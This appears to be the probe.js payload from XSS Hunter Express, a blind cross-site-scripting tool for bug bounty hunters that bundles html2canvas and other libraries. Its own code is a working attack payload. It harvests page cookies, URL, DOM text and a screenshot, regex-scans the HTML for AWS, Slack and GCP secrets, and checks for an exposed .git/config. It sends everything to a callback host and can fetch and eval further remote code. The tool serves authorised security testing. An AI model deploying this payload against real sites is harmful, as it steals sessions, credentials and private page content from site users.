xsshunter/probe.js

380 lines
216 KiB
JavaScript
Raw Normal View History

2021-05-31 19:06:40 +00:00
/*
$$$$$$\ $$\ $$\ $$$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$$$\ $$$$$$\ $$\ $$\ $$$$$$$$\ $$\
\_$$ _|$$$\ $$$ |$$ __$$\ $$ __$$\ $$ __$$\\__$$ __|$$ __$$\ $$$\ $$ |\__$$ __|$$ |
$$ | $$$$\ $$$$ |$$ | $$ |$$ / $$ |$$ | $$ | $$ | $$ / $$ |$$$$\ $$ | $$ | $$ |
$$ | $$\$$\$$ $$ |$$$$$$$ |$$ | $$ |$$$$$$$ | $$ | $$$$$$$$ |$$ $$\$$ | $$ | $$ |
$$ | $$ \$$$ $$ |$$ ____/ $$ | $$ |$$ __$$< $$ | $$ __$$ |$$ \$$$$ | $$ | \__|
$$ | $$ |\$ /$$ |$$ | $$ | $$ |$$ | $$ | $$ | $$ | $$ |$$ |\$$$ | $$ |
$$$$$$\ $$ | \_/ $$ |$$ | $$$$$$ |$$ | $$ | $$ | $$ | $$ |$$ | \$$ | $$ | $$\
\______|\__| \__|\__| \______/ \__| \__| \__| \__| \__|\__| \__| \__| \__|
$$$$$$$\ $$\ $$$$$$$\ $$\
$$ __$$\ $$ | $$ __$$\ $$ |
$$ | $$ |$$ | $$$$$$\ $$$$$$\ $$$$$$$\ $$$$$$\ $$ | $$ | $$$$$$\ $$$$$$\ $$$$$$$ |
$$$$$$$ |$$ |$$ __$$\ \____$$\ $$ _____|$$ __$$\ $$$$$$$ |$$ __$$\ \____$$\ $$ __$$ |
$$ ____/ $$ |$$$$$$$$ | $$$$$$$ |\$$$$$$\ $$$$$$$$ | $$ __$$< $$$$$$$$ | $$$$$$$ |$$ / $$ |
$$ | $$ |$$ ____|$$ __$$ | \____$$\ $$ ____| $$ | $$ |$$ ____|$$ __$$ |$$ | $$ |
$$ | $$ |\$$$$$$$\ \$$$$$$$ |$$$$$$$ |\$$$$$$$\ $$ | $$ |\$$$$$$$\ \$$$$$$$ |\$$$$$$$ |
\__| \__| \_______| \_______|\_______/ \_______| \__| \__| \_______| \_______| \_______|
This is a payload to test for Cross-site Scripting (XSS). It is meant to be used by security professionals and bug bounty hunters.
This is a self-hosted instance of XSS Hunter Express. It is not the same as the XSS Hunter website.
*/
2023-01-14 01:26:10 +00:00
// Blur canvas https://github.com/flozz/StackBlur
!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports):"function"==typeof define&&define.amd?define(["exports"],e):e((t="undefined"!=typeof globalThis?globalThis:t||self).StackBlur={})}(this,(function(t){"use strict";function e(t){return(e="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(t){return typeof t}:function(t){return t&&"function"==typeof Symbol&&t.constructor===Symbol&&t!==Symbol.prototype?"symbol":typeof t})(t)}var r=[512,512,456,512,328,456,335,512,405,328,271,456,388,335,292,512,454,405,364,328,298,271,496,456,420,388,360,335,312,292,273,512,482,454,428,405,383,364,345,328,312,298,284,271,259,496,475,456,437,420,404,388,374,360,347,335,323,312,302,292,282,273,265,512,497,482,468,454,441,428,417,405,394,383,373,364,354,345,337,328,320,312,305,298,291,284,278,271,265,259,507,496,485,475,465,456,446,437,428,420,412,404,396,388,381,374,367,360,354,347,341,335,329,323,318,312,307,302,297,292,287,282,278,273,269,265,261,512,505,497,489,482,475,468,461,454,447,441,435,428,422,417,411,405,399,394,389,383,378,373,368,364,359,354,350,345,341,337,332,328,324,320,316,312,309,305,301,298,294,291,287,284,281,278,274,271,268,265,262,259,257,507,501,496,491,485,480,475,470,465,460,456,451,446,442,437,433,428,424,420,416,412,408,404,400,396,392,388,385,381,377,374,370,367,363,360,357,354,350,347,344,341,338,335,332,329,326,323,320,318,315,312,310,307,304,302,299,297,294,292,289,287,285,282,280,278,275,273,271,269,267,265,263,261,259],n=[9,11,12,13,13,14,14,15,15,15,15,16,16,16,16,17,17,17,17,17,17,17,18,18,18,18,18,18,18,18,18,19,19,19,19,19,19,19,19,19,19,19,19,19,19,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,20,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,21,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,22,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,23,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24,24];function a(t,r,n,a,o){if("string"==typeof t&&(t=document.getElementById(t)),!t||"object"!==e(t)||!("getContext"in t))throw new TypeError("Expecting canvas with `getContext` method in processCanvasRGB(A) calls!");var i=t.getContext("2d");try{return i.getImageData(r,n,a,o)}catch(t){throw new Error("unable to access image data: "+t)}}function o(t,e,r,n,o,f){if(!(isNaN(f)||f<1)){f|=0;var g=a(t,e,r,n,o);g=i(g,e,r,n,o,f),t.getContext("2d").putImageData(g,e,r)}}function i(t,e,a,o,i,f){for(var g,l=t.data,c=2*f+1,s=o-1,v=i-1,b=f+1,x=b*(b+1)/2,d=new u,y=d,h=1;h<c;h++)y=y.next=new u,h===b&&(g=y);y.next=d;for(var p=null,m=null,w=0,B=0,C=r[f],E=n[f],I=0;I<i;I++){y=d;for(var S=l[B],N=l[B+1],R=l[B+2],D=l[B+3],G=0;G<b;G++)y.r=S,y.g=N,y.b=R,y.a=D,y=y.next;for(var T=0,j=0,A=0,W=0,k=b*S,H=b*N,_=b*R,M=b*D,O=x*S,P=x*N,q=x*R,z=x*D,F=1;F<b;F++){var J=B+((s<F?s:F)<<2),K=l[J],L=l[J+1],Q=l[J+2],U=l[J+3],V=b-F;O+=(y.r=K)*V,P+=(y.g=L)*V,q+=(y.b=Q)*V,z+=(y.a=U)*V,T+=K,j+=L,A+=Q,W+=U,y=y.next}p=d,m=g;for(var X=0;X<o;X++){var Y=z*C>>E;if(l[B+3]=Y,0!==Y){var Z=255/Y;l[B]=(O*C>>E)*Z,l[B+1]=(P*C>>E)*Z,l[B+2]=(q*C>>E)*Z}else l[B]=l[B+1]=l[B+2]=0;O-=k,P-=H,q-=_,z-=M,k-=p.r,H-=p.g,_-=p.b,M-=p.a;var $=X+f+1;$=w+($<s?$:s)<<2,O+=T+=p.r=l[$],P+=j+=p.g=l[$+1],q+=A+=p.b=l[$+2],z+=W+=p.a=l[$+3],p=p.next;var tt=m,et=tt.r,rt=tt.g,nt=tt.b,at=tt.a;k+=et,H+=rt,_+=nt,M+=at,T-=et,j-=rt,A-=nt,W-=at,m=m.next,B+=4}w+=o}for(var ot=0;ot<o;ot++){var it=l[B=ot<<2],ft=l[B+1],gt=l[B+2],ut=l[B+3],lt=b*it,ct=b*ft,st=b*gt,vt=b*ut,bt=x*it,xt=x*ft,dt=x*gt,yt=x*ut;y=d;for(var ht=0;ht<b;ht++)y.r=it,y.g=ft,y.b=gt,y.a=ut,y=y.next;for(var pt=o,mt=0,wt=0,Bt=0,Ct=0,Et=1;Et<=f;Et++){B=pt+ot<<2;var It=b-Et;bt+=(y.r=it=l[B])*It,xt+=(y.g=ft=l[B+1])*It,dt+=(y.b=gt=l[B+2])*It,yt+=(y.a=ut=l[B+3])*It,Ct+=it,mt+=ft,wt+=gt,Bt+=ut,y=y.next,Et<v&&(pt+=o)}B=ot,p=d,m=g;for(var St=0;
//# sourceMappingURL=stackblur.min.js.map
2021-05-31 19:06:40 +00:00
// FormData polyfill https://github.com/jimmywarting/FormData
if("undefined"!=typeof Blob&&("undefined"==typeof FormData||!FormData.prototype.keys)){const e="object"==typeof globalThis?globalThis:"object"==typeof window?window:"object"==typeof self?self:this,t=e.FormData,n=e.XMLHttpRequest&&e.XMLHttpRequest.prototype.send,o=e.Request&&e.fetch,a=e.navigator&&e.navigator.sendBeacon,s=e.Element&&e.Element.prototype,r=e.Symbol&&Symbol.toStringTag;r&&(Blob.prototype[r]||(Blob.prototype[r]="Blob"),"File"in e&&!File.prototype[r]&&(File.prototype[r]="File"));try{new File([],"")}catch(t){e.File=function(e,t,n){const o=new Blob(e,n),a=n&&void 0!==n.lastModified?new Date(n.lastModified):new Date;return Object.defineProperties(o,{name:{value:t},lastModifiedDate:{value:a},lastModified:{value:+a},toString:{value:()=>"[object File]"}}),r&&Object.defineProperty(o,r,{value:"File"}),o}}function normalizeValue([e,t,n]){return t instanceof Blob&&(t=new File([t],n,{type:t.type,lastModified:t.lastModified})),[e,t]}function ensureArgs(e,t){if(e.length<t)throw new TypeError(`${t} argument required, but only ${e.length} present.`)}function normalizeArgs(e,t,n){return t instanceof Blob?[String(e),t,void 0!==n?n+"":"string"==typeof t.name?t.name:"blob"]:[String(e),String(t)]}function normalizeLinefeeds(e){return e.replace(/\r\n/g,"\n").replace(/\n/g,"\r\n")}function each(e,t){for(let n=0;n<e.length;n++)t(e[n])}class i{constructor(e){this._data=[];const t=this;e&&each(e.elements,e=>{if(e.name&&!e.disabled&&"submit"!==e.type&&"button"!==e.type&&!e.matches("form fieldset[disabled] *"))if("file"===e.type){each(e.files&&e.files.length?e.files:[new File([],"",{type:"application/octet-stream"})],n=>{t.append(e.name,n)})}else if("select-multiple"===e.type||"select-one"===e.type)each(e.options,n=>{!n.disabled&&n.selected&&t.append(e.name,n.value)});else if("checkbox"===e.type||"radio"===e.type)e.checked&&t.append(e.name,e.value);else{const n="textarea"===e.type?normalizeLinefeeds(e.value):e.value;t.append(e.name,n)}})}append(e,t,n){ensureArgs(arguments,2),this._data.push(normalizeArgs(e,t,n))}delete(e){ensureArgs(arguments,1);const t=[];e=String(e),each(this._data,n=>{n[0]!==e&&t.push(n)}),this._data=t}*entries(){for(var e=0;e<this._data.length;e++)yield normalizeValue(this._data[e])}forEach(e,t){ensureArgs(arguments,1);for(const[n,o]of this)e.call(t,o,n,this)}get(e){ensureArgs(arguments,1);const t=this._data;e=String(e);for(let n=0;n<t.length;n++)if(t[n][0]===e)return normalizeValue(t[n])[1];return null}getAll(e){ensureArgs(arguments,1);const t=[];return e=String(e),each(this._data,n=>{n[0]===e&&t.push(normalizeValue(n)[1])}),t}has(e){ensureArgs(arguments,1),e=String(e);for(let t=0;t<this._data.length;t++)if(this._data[t][0]===e)return!0;return!1}*keys(){for(const[e]of this)yield e}set(e,t,n){ensureArgs(arguments,2),e=String(e);const o=[],a=normalizeArgs(e,t,n);let s=!0;each(this._data,t=>{t[0]===e?s&&(s=!o.push(a)):o.push(t)}),s&&o.push(a),this._data=o}*values(){for(const[,e]of this)yield e}_asNative(){const e=new t;for(const[t,n]of this)e.append(t,n);return e}_blob(){const e="----formdata-polyfill-"+Math.random(),t=[];for(const[n,o]of this)t.push(`--${e}\r\n`),o instanceof Blob?t.push(`Content-Disposition: form-data; name="${n}"; filename="${o.name}"\r\n`+`Content-Type: ${o.type||"application/octet-stream"}\r\n\r\n`,o,"\r\n"):t.push(`Content-Disposition: form-data; name="${n}"\r\n\r\n${o}\r\n`);return t.push(`--${e}--`),new Blob(t,{type:"multipart/form-data; boundary="+e})}[Symbol.iterator](){return this.entries()}toString(){return"[object FormData]"}}if(s&&!s.matches&&(s.matches=s.matchesSelector||s.mozMatchesSelector||s.msMatchesSelector||s.oMatchesSelector||s.webkitMatchesSelector||function(e){for(var t=(this.document||this.ownerDocument).querySelectorAll(e),n=t.length;--n>=0&&t.item(n)!==this;);return n>-1}),r&&(i.prototype[r]="FormData"),n){const t=e.XMLHttpRequest.prototype.setRequestHeader;e.XMLHttpRequest.prototype.setRequestHeader=function(e,n){t.call(this,e,n),"content-type"===e.toLowerCase()&&(this._hasContentType=!0)},e.XMLHttpRequest.prototype.send=function(e){if(e instanceof i){const t=e._blob();thi
// https://github.com/niklasvh/html2canvas
2023-01-14 01:47:27 +00:00
/*!
* html2canvas 1.4.1 <https://html2canvas.hertzen.com>
* Copyright (c) 2022 Niklas von Hertzen <https://hertzen.com>
* Released under MIT License
*/
!function(A,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define(e):(A="undefined"!=typeof globalThis?globalThis:A||self).html2canvas=e()}(this,function(){"use strict";
/*! *****************************************************************************
Copyright (c) Microsoft Corporation.
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES WITH
REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY SPECIAL, DIRECT,
INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM
LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
PERFORMANCE OF THIS SOFTWARE.
2023-01-14 02:17:28 +00:00
***************************************************************************** */var r=function(A,e){return(r=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(A,e){A.__proto__=e}||function(A,e){for(var t in e)Object.prototype.hasOwnProperty.call(e,t)&&(A[t]=e[t])})(A,e)};function A(A,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function t(){this.constructor=A}r(A,e),A.prototype=null===e?Object.create(e):(t.prototype=e.prototype,new t)}var h=function(){return(h=Object.assign||function(A){for(var e,t=1,r=arguments.length;t<r;t++)for(var B in e=arguments[t])Object.prototype.hasOwnProperty.call(e,B)&&(A[B]=e[B]);return A}).apply(this,arguments)};function a(A,s,o,i){return new(o=o||Promise)(function(t,e){function r(A){try{n(i.next(A))}catch(A){e(A)}}function B(A){try{n(i.throw(A))}catch(A){e(A)}}function n(A){var e;A.done?t(A.value):((e=A.value)instanceof o?e:new o(function(A){A(e)})).then(r,B)}n((i=i.apply(A,s||[])).next())})}function H(t,r){var B,n,s,o={label:0,sent:function(){if(1&s[0])throw s[1];return s[1]},trys:[],ops:[]},A={next:e(0),throw:e(1),return:e(2)};return"function"==typeof Symbol&&(A[Symbol.iterator]=function(){return this}),A;function e(e){return function(A){return function(e){if(B)throw new TypeError("Generator is already executing.");for(;o;)try{if(B=1,n&&(s=2&e[0]?n.return:e[0]?n.throw||((s=n.return)&&s.call(n),0):n.next)&&!(s=s.call(n,e[1])).done)return s;switch(n=0,(e=s?[2&e[0],s.value]:e)[0]){case 0:case 1:s=e;break;case 4:return o.label++,{value:e[1],done:!1};case 5:o.label++,n=e[1],e=[0];continue;case 7:e=o.ops.pop(),o.trys.pop();continue;default:if(!(s=0<(s=o.trys).length&&s[s.length-1])&&(6===e[0]||2===e[0])){o=0;continue}if(3===e[0]&&(!s||e[1]>s[0]&&e[1]<s[3])){o.label=e[1];break}if(6===e[0]&&o.label<s[1]){o.label=s[1],s=e;break}if(s&&o.label<s[2]){o.label=s[2],o.ops.push(e);break}s[2]&&o.ops.pop(),o.trys.pop();continue}e=r.call(t,o)}catch(A){e=[6,A],n=0}finally{B=s=0}if(5&e[0])throw e[1];return{value:e[0]?e[1]:void 0,done:!0}}([e,A])}}}function t(A,e,t){if(t||2===arguments.length)for(var r,B=0,n=e.length;B<n;B++)!r&&B in e||((r=r||Array.prototype.slice.call(e,0,B))[B]=e[B]);return A.concat(r||e)}var d=(B.prototype.add=function(A,e,t,r){return new B(this.left+A,this.top+e,this.width+t,this.height+r)},B.fromClientRect=function(A,e){return new B(e.left+A.windowBounds.left,e.top+A.windowBounds.top,e.width,e.height)},B.fromDOMRectList=function(A,e){e=Array.from(e).find(function(A){return 0!==A.width});return e?new B(e.left+A.windowBounds.left,e.top+A.windowBounds.top,e.width,e.height):B.EMPTY},B.EMPTY=new B(0,0,0,0),B);function B(A,e,t,r){this.left=A,this.top=e,this.width=t,this.height=r}for(var f=function(A,e){return d.fromClientRect(A,e.getBoundingClientRect())},Q=function(A){for(var e=[],t=0,r=A.length;t<r;){var B,n=A.charCodeAt(t++);55296<=n&&n<=56319&&t<r?56320==(64512&(B=A.charCodeAt(t++)))?e.push(((1023&n)<<10)+(1023&B)+65536):(e.push(n),t--):e.push(n)}return e},g=function(){for(var A=[],e=0;e<arguments.length;e++)A[e]=arguments[e];if(String.fromCodePoint)return String.fromCodePoint.apply(String,A);var t=A.length;if(!t)return"";for(var r=[],B=-1,n="";++B<t;){var s=A[B];s<=65535?r.push(s):(s-=65536,r.push(55296+(s>>10),s%1024+56320)),(B+1===t||16384<r.length)&&(n+=String.fromCharCode.apply(String,r),r.length=0)}return n},e="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",n="undefined"==typeof Uint8Array?[]:new Uint8Array(256),s=0;s<e.length;s++)n[e.charCodeAt(s)]=s;for(var o="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",c="undefined"==typeof Uint8Array?[]:new Uint8Array(256),i=0;i<o.length;i++)c[o.charCodeAt(i)]=i;function w(A,e,t){return A.slice?A.slice(e,t):new Uint16Array(Array.prototype.slice.call(A,e,t))}var U=(l.prototype.get=function(A){var e;if(0<=A){if(A<55296||56319<A&&A<=65535)return e=this.index[A>>5],this.data[e=(e<<2)+(31&A)];if(A<=65535)return e=this.index[2048+(A-55296>>5)],this.data[e=(e<<2)+(31&A)];if(A<this.highStart)return e=this.index[e=2080+
2021-05-31 19:06:40 +00:00
var chainload_uri = [CHAINLOAD_REPLACE_ME];
var collect_page_list = [COLLECT_PAGE_LIST_REPLACE_ME]
// Source: https://stackoverflow.com/a/20151856/1195812
function base64_to_blob(base64Data, contentType) {
contentType = contentType || '';
var sliceSize = 1024;
var byteCharacters = atob(base64Data);
var bytesLength = byteCharacters.length;
var slicesCount = Math.ceil(bytesLength / sliceSize);
var byteArrays = new Array(slicesCount);
for (var sliceIndex = 0; sliceIndex < slicesCount; ++sliceIndex) {
var begin = sliceIndex * sliceSize;
var end = Math.min(begin + sliceSize, bytesLength);
var bytes = new Array(end - begin);
for (var offset = begin, i = 0; offset < end; ++i, ++offset) {
bytes[i] = byteCharacters[offset].charCodeAt(0);
}
byteArrays[sliceIndex] = new Uint8Array(bytes);
}
return new Blob(byteArrays, { type: contentType });
}
2023-01-26 17:53:54 +00:00
let check_cors = async function(){
let res = await fetch("", {method: 'HEAD'})
for (const header of res.headers){
if (header[0].toLowerCase() == "access-control-allow-origin"){
return header[1];
}
}
return false
}
let check_git = async function(){
let res = await fetch("/.git/config");
let text = await res.text();
if (text.startsWith("[core]")){
return text
}
return false
}
2021-05-31 19:06:40 +00:00
function get_guid() {
var S4 = function() {
return (((1+Math.random())*0x10000)|0).toString(16).substring(1);
};
return (S4()+S4()+"-"+S4()+"-"+S4()+"-"+S4()+"-"+S4()+S4()+S4());
}
function never_null( value ) {
if( value !== undefined ) {
return value;
} else {
return '';
}
}
function collect_pages() {
for( var i = 0; i < collect_page_list.length; i++ ) {
// Make sure the path is correctly formatted
if( collect_page_list[i].charAt(0) != "/" ) {
collect_page_list[i] = "/" + collect_page_list[i];
}
collect_page_data( collect_page_list[i] );
}
}
function eval_remote_source( uri ) {
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if ( xhr.readyState == XMLHttpRequest.DONE ) {
eval( xhr.responseText );
}
}
xhr.open( 'GET', uri, true );
xhr.send( null );
}
function addEvent(element, eventName, fn) {
if (element.addEventListener)
element.addEventListener(eventName, fn, false);
else if (element.attachEvent)
element.attachEvent('on' + eventName, fn);
}
function get_dom_text() {
var text_extractions_to_try = [
document.body.outerText,
document.body.innerText,
document.body.textContent,
];
for(var i = 0; i < text_extractions_to_try.length; i++) {
if(typeof text_extractions_to_try[i] === 'string') {
return text_extractions_to_try[i];
}
}
return '';
}
function generate_random_string(length) {
var return_array = [];
var characters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789';
var charactersLength = characters.length;
for (var i = 0; i < length; i++) {
return_array.push(characters.charAt(Math.floor(Math.random() * charactersLength)));
}
return return_array.join("");
}
function contact_mothership(probe_return_data) {
var form_data = new FormData();
var payload_keys = Object.keys(probe_return_data);
payload_keys.map(function(payload_key) {
if(payload_key === 'screenshot') {
var base64_data = probe_return_data[payload_key].replace(
'data:image/png;base64,',
''
);
var screenshot_blob = base64_to_blob(
base64_data,
'image/png'
);
form_data.append(
payload_key,
screenshot_blob,
"screenshot.png"
)
return
}
form_data.append(payload_key, probe_return_data[payload_key]);
});
var http = new XMLHttpRequest();
var url = "[HOST_URL]/js_callback";
http.open("POST", url, true);
http.onreadystatechange = function() {
if(http.readyState == 4 && http.status == 200) {
}
}
2023-01-16 03:19:41 +00:00
form_data.append("path", "[USER_PATH]");
2021-05-31 19:06:40 +00:00
http.send(form_data);
}
function send_collected_page( page_data ) {
var form_data = new FormData();
var payload_keys = Object.keys(page_data);
payload_keys.map(function(payload_key) {
form_data.append(payload_key, page_data[payload_key]);
});
var http = new XMLHttpRequest();
var url = "[HOST_URL]/page_callback";
http.open("POST", url, true);
http.onreadystatechange = function() {
if(http.readyState == 4 && http.status == 200) {
}
}
2023-01-16 03:32:50 +00:00
form_data.append("path", "[USER_PATH]");
2021-05-31 19:06:40 +00:00
http.send(form_data);
}
2023-01-14 05:51:05 +00:00
function look_for_secrets( data ) {
var findings = [];
let secret_regexes = {
2023-01-16 04:08:48 +00:00
"aws": "((?:AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16})",
2023-01-14 05:51:05 +00:00
"slack": "(https://hooks\.slack\.com/services/[A-Za-z0-9+/]{44,46})",
"GCP": "\{[^{]+auth_provider_x509_cert_url[^}]+\}"
}
for (let secret_type in secret_regexes){
let re = new RegExp(secret_regexes[secret_type])
let match = re.exec(data);
2023-01-16 03:59:18 +00:00
if (Array.isArray(match)){
match = match.toString()
let finding = {};
finding = {"secret_type": secret_type, "secret_value": match};
findings.push(finding);
}
2023-01-14 05:51:05 +00:00
}
return findings
}
2021-05-31 19:06:40 +00:00
function collect_page_data( path ) {
try {
var full_url = location.protocol + "//" + document.domain + path
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
page_data = {
"html": xhr.responseText,
"uri": full_url
}
send_collected_page( page_data );
}
}
xhr.open('GET', full_url, true);
xhr.send(null);
} catch ( e ) {
}
}
probe_return_data = {};
// Prevent failure incase the browser refuses to give us any of the probe data.
try {
probe_return_data['uri'] = never_null( location.toString() );
} catch ( e ) {
probe_return_data['uri'] = '';
}
try {
probe_return_data['cookies'] = never_null( document.cookie );
} catch ( e ) {
probe_return_data['cookies'] = '';
}
try {
probe_return_data['referrer'] = never_null( document.referrer );
} catch ( e ) {
probe_return_data['referrer'] = '';
}
try {
probe_return_data['user-agent'] = never_null( navigator.userAgent );
} catch ( e ) {
probe_return_data['user-agent'] = '';
}
try {
probe_return_data['browser-time'] = never_null( ( new Date().getTime() ) );
} catch ( e ) {
probe_return_data['browser-time'] = '';
}
try {
probe_return_data['probe-uid'] = never_null( get_guid() );
} catch ( e ) {
probe_return_data['probe-uid'] = '';
}
try {
probe_return_data['origin'] = never_null( location.origin );
} catch ( e ) {
probe_return_data['origin'] = '';
}
try {
probe_return_data['injection_key'] = [PROBE_ID];
} catch ( e ) {
probe_return_data['injection_key'] = '';
}
try{
probe_return_data['title'] = document.title;
} catch( e ){
probe_return_data['title'] = '';
}
try{
probe_return_data['text'] = get_dom_text();
} catch( e ){
probe_return_data['text'] = '';
}
2021-05-31 19:06:40 +00:00
try{
probe_return_data['was_iframe'] = !(window.top === window)
} catch( e ){
probe_return_data['was_iframe'] = '';
2021-05-31 19:06:40 +00:00
}
2023-01-14 05:36:02 +00:00
2021-05-31 19:06:40 +00:00
async function hook_load_if_not_ready() {
2021-05-31 19:06:40 +00:00
try {
try {
2023-01-14 05:51:05 +00:00
probe_return_data['secrets'] = look_for_secrets(never_null( document.documentElement.outerHTML ));
2021-05-31 19:06:40 +00:00
} catch ( e ) {
2023-01-14 05:51:05 +00:00
probe_return_data['secrets'] = [];
2021-05-31 19:06:40 +00:00
}
2023-01-26 17:53:54 +00:00
try{
const corsResults = await check_cors();
probe_return_data['CORS'] = corsResults;
2023-01-26 17:53:54 +00:00
} catch (e) {
2023-01-29 00:47:46 +00:00
probe_return_data['CORS'] = "false";
2023-01-26 17:53:54 +00:00
}
try{
const gitResults = await check_git();
probe_return_data['gitExposed'] = gitResults;
2023-01-26 17:53:54 +00:00
} catch (e) {
2023-01-29 00:47:46 +00:00
probe_return_data['gitExposed'] = "false";
2023-01-26 17:53:54 +00:00
}
2023-01-16 03:52:07 +00:00
probe_return_data['secrets'] = JSON.stringify(probe_return_data['secrets']);
2021-05-31 19:06:40 +00:00
html2canvas(document.body).then(function(canvas) {
2023-01-14 01:26:10 +00:00
StackBlur.canvasRGB(
2023-01-14 01:47:27 +00:00
canvas, 0, 0, canvas.width, canvas.height, 20
2023-01-14 01:26:10 +00:00
);
2023-01-14 02:10:07 +00:00
var tempCanvas = document.createElement("canvas"),
tCtx = tempCanvas.getContext("2d");
tempCanvas.width = 2560;
tempCanvas.height = 1440;
2023-01-14 02:33:17 +00:00
tCtx.drawImage(canvas,0,0);
2023-01-14 02:30:56 +00:00
probe_return_data['screenshot'] = tempCanvas.toDataURL();
2021-05-31 19:06:40 +00:00
finishing_moves();
});
} catch( e ) {
probe_return_data['screenshot'] = '';
finishing_moves();
}
}
function finishing_moves() {
contact_mothership( probe_return_data );
collect_pages();
if( chainload_uri != "" && chainload_uri != null ) {
eval_remote_source( chainload_uri );
}
}
if( document.readyState == "complete" ) {
hook_load_if_not_ready();
} else {
addEvent( window, "load", function(){
hook_load_if_not_ready();
});
}